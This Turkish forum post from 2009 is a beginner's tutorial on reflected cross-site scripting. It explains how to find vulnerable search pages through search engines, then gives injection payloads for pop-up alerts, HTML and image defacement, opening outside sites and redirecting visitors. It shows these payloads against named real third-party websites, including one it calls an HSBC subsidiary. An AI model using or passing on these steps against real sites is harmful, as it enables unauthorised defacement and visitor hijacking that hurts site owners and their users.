XSS Açıgı hakkında sitemizde ne oldugu ne işe yaradıgı vs vs bilgiler bulunmaktadır,fakat ben olayı biraz daha kolaya indirgeyerek
ve xss de ilk adım olan yerleri bilmiyenler için açıklayayım dedim,bazı yerlerde resim ekliyerek neyin ne oldugunun biraz daha açıklayıcı
olmasını istedim.
,,
1)İlk aşamamız ilgili açıgın bulundugu bir site bulmak ( google veya msn.com ) gibi arama motoru bulunan sitelerde
şu şekilde taramalar yapıyoruz "search.php?q=" - "search.asp?=" ( Aramalarımız asp veya php sitelerde index,default,search,"türk siteleri için
kendimiz birşeyler türetebiliriz örnegin arama,iletişim,anasayfa vs vs bunlar bizim kendimizin türetecegi şeyler) Hiç ummadıgımız yerlerde karşımıza
çıkabilir bu yüzden siteleri iyi kurcalamak gerekir.
2)İkinci aşamak olarak bulmuş oldugumuz site üzerinde
<script>alert("XSS")</script> kodlarını kullanarak “popup” ikazı verdirmektir
Örnegin;
Php site :
http://hedefsite.com/search.php?q=<script>alert("SABOTE")</script>Asp site :
http://hedefsite.com/search.asp?q="><script>alert("SABOTE")</script>Parantez içindeki SABOTE yazısını istegimiz dogrultusunda degiştirebiliriz
Örnek siteler;
Php Site :
http://bodington.org/search.php?q=<script>alert("SABOTE")</script>Asp site :
http://www.hsbc.guyerzeller.com/de/search.asp?="><script>alert("SABOTE")</script>HSBC Bank’ı bilmeyenimiz yoktur buda onun yavru sitelerinden biri olmalı geçenlerde buldum:)
[img width=538 height=400]
http://resimupload.gen.tr/images/3446o970ixe0j8vi6b5.jpg[/img][img width=538 height=400]
http://resimupload.gen.tr/images/9z9edr7hvd4mjyxb9r.jpg[/img]Resimden görüldügü gibi SABOTE yazısı çıktı.
3)Üçüncü aşama olarak Html kod çalıştıracaz
http://hedefsite.com/search.php?q=<f...COM</B></font>Örn Site:
http://bodington.org/search.php?q=<F...COM</B></FONT>[img width=538 height=400]
http://resimupload.gen.tr/images/t4dx68i0zgj7o151xdmz.jpg[/img]Resimde görüldügü gibi html kodları arasına yazdıgımız SABOTE.COM çıktı.
4)Siteye Resim ekliyecez,
Site :
http://bodington.org/search.php?q=Ekliyecegimiz kod : <html><bOdy><IMG src= "http://www.sabote.com/images/ustlogo.gif">
yani :
http://bodington.org/search.php?q=<h.../ustlogo.gif">[img width=538 height=400]
http://resimupload.gen.tr/images/el48ankaxgq2lc9rrqwu.jpg[/img]Resimde görüldügü gibi sabote Logosu çıktı.
Resimlerimizin boyutunu ister ekledigimiz kodlar sayesinde yada ekleyecegimiz resmi
büyük koyarak sitede tam boy olarak resmimizi gösterebiliriz.
5)Yeni sayfada istedigimiz bir site açma
Sitenin sonuna ekliyecegimiz kod;
<script>window.open( "http://www.sabote.com/" )</script>
6)Son olarak Siteyi istedigimiz bir yere yönlendirecez
Ekliyecegimiz kod,
<**** http-equiv="refresh" content="2;URL=http://www.google.com/">
Site:
http://bodington.org/search.php?q=<**** http-equiv="refresh" content="2;URL=http://www.google.com/">
Verdigimiz kod’da belirtilen sürede site istedigim yere yönlenecektir.
Sonuç olarak sitede html kodları çalıştırma popup ikazı vermeyi , resim göstermeyi ve ve yönlendirmeyi gördük.
Bunların bir üst seviyelerindeki uygulamalı yerleri birdahaki sefere Allahın izni ile sizinle paylaşacam.
SELAMETLE....
Cuma Şub. 27, 2009 7:24 pm